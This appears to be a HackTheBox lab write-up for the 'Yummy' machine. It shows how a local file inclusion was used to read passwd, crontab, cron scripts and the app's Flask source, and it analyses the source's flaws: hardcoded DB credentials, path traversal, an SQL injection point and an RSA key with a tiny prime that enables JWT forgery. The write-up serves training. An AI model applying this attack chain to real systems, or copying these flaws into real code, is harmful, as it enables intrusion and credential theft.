LFI (Local File Inclusion)
LFI has been identified and confirmed at the export function of the iCalendar feature
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ cat ~/Downloads/passwd | grep -i /bin/bash
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:dev:/home/dev:/bin/bash
qa:x:1001:1001::/home/qa:/bin/bash
Those are the 3 legit system users
Continuing the enumeration through the LFI
Crontab
*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh
*/15 * * * * mysql /bin/bash /data/scripts/table_cleanup.sh
* * * * * mysql /bin/bash /data/scripts/dbmonitor.sh
Checking the crontab file reveals that there are 3 cronjobs. They are all located under the /data/scripts
directory
app_backup.sh
#!/bin/bash
cd /var/www
/usr/bin/rm backupapp.zip
/usr/bin/zip -r backupapp.zip /opt/app
The app_backup.sh
file is a Bash script that archives the web application located at /opt/app
to the /var/www
directory
I can obtain that
backupapp.zip
file via the same LFI method
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ mv ~/Downloads/backupapp.zip .
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ unzip -q backupapp.zip
Extracting content
Source Code Analysis
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ ll .
total 6.6M
4.0K drwxrwxr-x 3 kali kali 4.0K Oct 6 06:20 .
4.0K drwxrwxr-x 3 kali kali 4.0K Oct 6 06:20 opt
6.5M -rw-rw-r-- 1 kali kali 6.5M Oct 6 06:19 backupapp.zip
4.0K drwxr-xr-x 146 kali kali 4.0K Oct 6 03:52 ..
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ ll opt/app/
total 40K
4.0K drwxrwxr-x 7 kali kali 4.0K Oct 6 06:29 .
4.0K drwxrwxr-x 3 kali kali 4.0K Oct 6 06:20 ..
4.0K drwxrwxr-x 2 kali kali 4.0K Sep 30 10:16 __pycache__
4.0K drwxr-xr-x 3 kali kali 4.0K Sep 30 10:16 config
4.0K drwxr-xr-x 3 kali kali 4.0K Sep 30 10:16 middleware
4.0K drwxr-xr-x 6 kali kali 4.0K Sep 30 10:16 static
4.0K drwxr-xr-x 2 kali kali 4.0K Sep 30 10:16 templates
12K -rw-r--r-- 1 kali kali 12K Sep 25 15:54 app.py
This is the web root directory
app.py
┌──(kali㉿kali)-[~/…/labs/yummy/opt/app]
└─$ cat app.py
from flask import Flask, request, send_file, render_template, redirect, url_for, flash, jsonify, make_response
import tempfile
import os
import shutil
from datetime import datetime, timedelta, timezone
from urllib.parse import quote
from ics import Calendar, Event
from middleware.verification import verify_token
from config import signature
import pymysql.cursors
from pymysql.constants import CLIENT
import jwt
import secrets
import hashlib
app = Flask(__name__, static_url_path='/static')
temp_dir = ''
app.secret_key = secrets.token_hex(32)
db_config = {
'host': '127.0.0.1',
'user': 'chef',
'password': '3wDo7gSRZIwIHRxZ!',
'database': 'yummy_db',
'cursorclass': pymysql.cursors.DictCursor,
'client_flag': CLIENT.MULTI_STATEMENTS
}
access_token = ''
@app.route('/login', methods=['GET','POST'])
def login():
global access_token
if request.method == 'GET':
return render_template('login.html', message=None)
elif request.method == 'POST':
email = request.json.get('email')
password = request.json.get('password')
password2 = hashlib.sha256(password.encode()).hexdigest()
if not email or not password:
return jsonify(message="email or password is missing"), 400
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "SELECT * FROM users WHERE email=%s AND password=%s"
cursor.execute(sql, (email, password2))
user = cursor.fetchone()
if user:
payload = {
'email': email,
'role': user['role_id'],
'iat': datetime.now(timezone.utc),
'exp': datetime.now(timezone.utc) + timedelta(seconds=3600),
'jwk':{'kty': 'RSA',"n":str(signature.n),"e":signature.e}
}
access_token = jwt.encode(payload, signature.key.export_key(), algorithm='RS256')
response = make_response(jsonify(access_token=access_token), 200)
response.set_cookie('X-AUTH-Token', access_token)
return response
else:
return jsonify(message="Invalid email or password"), 401
finally:
connection.close()
@app.route('/logout', methods=['GET'])
def logout():
response = make_response(redirect('/login'))
response.set_cookie('X-AUTH-Token', '')
return response
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'GET':
return render_template('register.html', message=None)
elif request.method == 'POST':
role_id = 'customer_' + secrets.token_hex(4)
email = request.json.get('email')
password = hashlib.sha256(request.json.get('password').encode()).hexdigest()
if not email or not password:
return jsonify(error="email or password is missing"), 400
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "SELECT * FROM users WHERE email=%s"
cursor.execute(sql, (email,))
existing_user = cursor.fetchone()
if existing_user:
return jsonify(error="Email already exists"), 400
else:
sql = "INSERT INTO users (email, password, role_id) VALUES (%s, %s, %s)"
cursor.execute(sql, (email, password, role_id))
connection.commit()
return jsonify(message="User registered successfully"), 201
finally:
connection.close()
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/book', methods=['GET', 'POST'])
def export():
if request.method == 'POST':
try:
name = request.form['name']
date = request.form['date']
time = request.form['time']
email = request.form['email']
num_people = request.form['people']
message = request.form['message']
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "INSERT INTO appointments (appointment_name, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES (%s, %s, %s, %s, %s, %s, %s)"
cursor.execute(sql, (name, email, date, time, num_people, message, 'customer'))
connection.commit()
flash('Your booking request was sent. You can manage your appointment further from your account. Thank you!', 'success')
except Exception as e:
print(e)
return redirect('/#book-a-table')
except ValueError:
flash('Error processing your request. Please try again.', 'error')
return render_template('index.html')
def generate_ics_file(name, date, time, email, num_people, message):
global temp_dir
temp_dir = tempfile.mkdtemp()
current_date_time = datetime.now()
formatted_date_time = current_date_time.strftime("%Y%m%d_%H%M%S")
cal = Calendar()
event = Event()
event.name = name
event.begin = datetime.strptime(date, "%Y-%m-%d")
event.description = f"Email: {email}\nNumber of People: {num_people}\nMessage: {message}"
cal.events.add(event)
temp_file_path = os.path.join(temp_dir, quote('Yummy_reservation_' + formatted_date_time + '.ics'))
with open(temp_file_path, 'w') as fp:
fp.write(cal.serialize())
return os.path.basename(temp_file_path)
@app.route('/export/<path:filename>')
def export_file(filename):
validation = validate_login()
if validation is None:
return redirect(url_for('login'))
filepath = os.path.join(temp_dir, filename)
if os.path.exists(filepath):
content = send_file(filepath, as_attachment=True)
shutil.rmtree(temp_dir)
return content
else:
shutil.rmtree(temp_dir)
return "File not found", 404
def validate_login():
try:
(email, current_role), status_code = verify_token()
if email and status_code == 200 and current_role == "administrator":
return current_role
elif email and status_code == 200:
return email
else:
raise Exception("Invalid token")
except Exception as e:
return None
@app.route('/dashboard', methods=['GET', 'POST'])
def dashboard():
validation = validate_login()
if validation is None:
return redirect(url_for('login'))
elif validation == "administrator":
return redirect(url_for('admindashboard'))
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "SELECT appointment_id, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s"
cursor.execute(sql, (validation,))
connection.commit()
appointments = cursor.fetchall()
appointments_sorted = sorted(appointments, key=lambda x: x['appointment_id'])
finally:
connection.close()
return render_template('dashboard.html', appointments=appointments_sorted)
@app.route('/delete/<appointID>')
def delete_file(appointID):
validation = validate_login()
if validation is None:
return redirect(url_for('login'))
elif validation == "administrator":
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "DELETE FROM appointments where appointment_id= %s;"
cursor.execute(sql, (appointID,))
connection.commit()
sql = "SELECT * from appointments"
cursor.execute(sql)
connection.commit()
appointments = cursor.fetchall()
finally:
connection.close()
flash("Reservation deleted successfully","success")
return redirect(url_for("admindashboard"))
else:
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "DELETE FROM appointments WHERE appointment_id = %s AND appointment_email = %s;"
cursor.execute(sql, (appointID, validation))
connection.commit()
sql = "SELECT appointment_id, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s"
cursor.execute(sql, (validation,))
connection.commit()
appointments = cursor.fetchall()
finally:
connection.close()
flash("Reservation deleted successfully","success")
return redirect(url_for("dashboard"))
flash("Something went wrong!","error")
return redirect(url_for("dashboard"))
@app.route('/reminder/<appointID>')
def reminder_file(appointID):
validation = validate_login()
if validation is None:
return redirect(url_for('login'))
connection = pymysql.connect(**db_config)
try:
with connection.cursor() as cursor:
sql = "SELECT appointment_id, appointment_name, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s AND appointment_id = %s"
result = cursor.execute(sql, (validation, appointID))
if result != 0:
connection.commit()
appointments = cursor.fetchone()
filename = generate_ics_file(appointments['appointment_name'], appointments['appointment_date'], appointments['appointment_time'], appointments['appointment_email'], appointments['appointment_people'], appointments['appointment_message'])
connection.close()
flash("Reservation downloaded successfully","success")
return redirect(url_for('export_file', filename=filename))
else:
flash("Something went wrong!","error")
except:
flash("Something went wrong!","error")
return redirect(url_for("dashboard"))
@app.route('/admindashboard', methods=['GET', 'POST'])
def admindashboard():
validation = validate_login()
if validation != "administrator":
return redirect(url_for('login'))
try:
connection = pymysql.connect(**db_config)
with connection.cursor() as cursor:
sql = "SELECT * from appointments"
cursor.execute(sql)
connection.commit()
appointments = cursor.fetchall()
search_query = request.args.get('s', '')
# added option to order the reservations
order_query = request.args.get('o', '')
sql = f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"
cursor.execute(sql, ('%' + search_query + '%',))
connection.commit()
appointments = cursor.fetchall()
connection.close()
return render_template('admindashboard.html', appointments=appointments)
except Exception as e:
flash(str(e), 'error')
return render_template('admindashboard.html', appointments=appointments)
if __name__ == '__main__':
app.run(threaded=True, debug=False, host='0.0.0.0', port=3000)
- There is a DB credential disclosure;
chef
:3wDo7gSRZIwIHRxZ!
- the DB is
yummy_db
- the DB is
- JWT uses a custom signature verification;
from config import signature
- There is the
export_file
function that is vulnerable to LFI as there is no input sanitization in place- It only checks the file by the
os.path.exists
method and sends out the file if the file exist
- It only checks the file by the
- There is a hidden endpoint,
/admindashboard
, only available to administrator- This is done by checking the
role
attribute in the JWT - This endpoint has a SQLi vulnerability in the
order_query
part of the SQL query
- This is done by checking the
config/signature.py
┌──(kali㉿kali)-[~/…/labs/yummy/opt/app]
└─$ cat config/signature.py
#!/usr/bin/python3
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy
# Generate RSA key pair
q = sympy.randprime(2**19, 2**20)
n = sympy.randprime(2**1023, 2**1024) * q
e = 65537
p = n // q
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()
private_key = serialization.load_pem_private_key(
private_key_bytes,
password=None,
backend=default_backend()
)
public_key = private_key.public_key()
RSA’s security relies heavily on the difficulty of factoring large numbers. If one of the primes used in generating the modulus is weak (too small), the modulus becomes easy to factor, defeating the entire purpose of RSA encryption/signing. In code above, since q
is so small, the modulus n
can be factored very quickly using even simple methods like trial division.
- Weak Prime Generation (
q
):q
is generated as a prime in the range of to , which is quite small for cryptographic purposes.- A prime in this range is far too small to provide adequate security. When one prime is this small, the modulus
n = p * q
can be factored easily, especially since the other primep = n // q
will also be large but can be easily derived onceq
is known.
- Factoring the Modulus (
n
):- With the modulus
n
being the product of a small primeq
and a larger primep
, an attacker can quickly factorn
by trial division or more sophisticated factoring methods. - Once an attacker has factored
n
, they can recover bothp
andq
. Using these, they can compute the private keyd
using the formula . - With the private key
d
, they can sign any data, including forging an administrative JWT (JSON Web Token), which could be disastrous for systems relying on that RSA key pair for authentication.
- With the modulus
If an attacker knows the modulus
n
and the public exponente
(which are public in RSA), they can:
- Factor
n
to findp
andq
(sinceq
is small).- Calculate the private exponent
d
as .- Once they have
d
, they can sign arbitrary data (such as an administrative JWT) and impersonate an admin.
To make the RSA key pair secure:
- Both
p
andq
must be large enough (typically at least 1024 bits each for a 2048-bit modulus).- In the case abov,
q
is only about 20 bits, which is drastically smaller than what it should be. This makesn
insecure.
Moving on to JWT Forgery
table_cleanup.sh
#!/bin/sh
/usr/bin/mysql -h localhost -u chef yummy_db -p'3wDo7gSRZIwIHRxZ!' < /data/scripts/sqlappointments.sql
The table_cleanup.sh
file is a Bash script that seems to reset the database to its original state;/data/scripts/sqlappointments.sql
It contains the same DB credential found earlier
dbmonitor.sh
#!/bin/bash
timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)
if [ "$response" != 'active' ]; then
/usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
/usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
/bin/bash "$latest_version"
else
if [ -f /data/scripts/dbstatus.json ]; then
if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
/usr/bin/echo "The database was down at $timestamp. Sending notification."
/usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
/usr/bin/rm -f /data/scripts/dbstatus.json
else
/usr/bin/rm -f /data/scripts/dbstatus.json
/usr/bin/echo "The automation failed in some way, attempting to fix it."
latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
/bin/bash "$latest_version"
fi
else
/usr/bin/echo "Response is OK."
fi
fi
[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json
The script monitors the status of the MySQL service, performs actions if it detects that the service is down, and attempts to restart it using a script named fixer-v*
. Additionally, it logs and sends notifications when the service status changes.
Step-by-Step Breakdown:
- Shebang Line:
#!/bin/bash
This indicates that the script is executed using the Bash shell.
- Capturing Timestamp and Service Status:
timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)
timestamp
: Stores the current date and time using the/usr/bin/date
command.service
: Stores the name of the service being monitored (mysql
).response
: Stores the output of/usr/bin/systemctl is-active mysql
, which checks if the MySQL service is running. The possible values can beactive
,inactive
, etc.
- Checking if MySQL is Down:
if [ "$response" != 'active' ]; then
If the response is anything other than active, this condition triggers the following actions (MySQL service is considered down).
- Log the Down Status and Attempt to Restart:
/usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
/usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
/bin/bash "$latest_version"
- The script logs the MySQL down status with a timestamp in
/data/scripts/dbstatus.json
. - It sends an email to
root
notifying that the MySQL service is down, using themail
command. - The script finds the latest version of a script named
fixer-v*
located in/data/scripts/
. This is done by:- Listing all files matching the pattern
fixer-v*
usingls -1
. - Sorting them using version sorting (
/usr/bin/sort -V
). - Picking the latest file using
tail -n 1
.
- Listing all files matching the pattern
- The latest version of the
fixer
script is executed using/bin/bash "$latest_version"
to attempt to restart or fix the service.
- Handling the Case Where MySQL is Up:
else
if [ -f /data/scripts/dbstatus.json ]; then
If the MySQL service is active
, the script checks if the dbstatus.json
file exists (which would indicate that the service was previously down).
- Database Recovery After Being Down:
if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
/usr/bin/echo "The database was down at $timestamp. Sending notification."
/usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
/usr/bin/rm -f /data/scripts/dbstatus.json
If the dbstatus.json
contains “database is down” (indicating the MySQL service was previously down), the script:
- Logs that the database was down but has come back up.
- Sends an email to
root
informing them that the MySQL service has recovered. - Deletes the
dbstatus.json
file since the issue has been resolved.
- Handling a Failed Automation Fix:
else
/usr/bin/rm -f /data/scripts/dbstatus.json
/usr/bin/echo "The automation failed in some way, attempting to fix it."
latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
/bin/bash "$latest_version"
- If the
dbstatus.json
file exists but does not contain “database is down,” the script assumes the previous attempt to fix the issue failed. - It tries to rerun the
fixer-v*
script again to attempt another fix. - It also removes the
dbstatus.json
file, possibly to ensure a clean state for future operations.
- MySQL is Running Normally:
else
/usr/bin/echo "Response is OK."
If there is no dbstatus.json file
and MySQL is running (response = active
), the script logs that the service is running normally.
- Cleaning Up the
dbstatus.json
File:
[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json
This final line ensures that any lingering dbstatus.json
file in the current working directory (if it exists) is removed.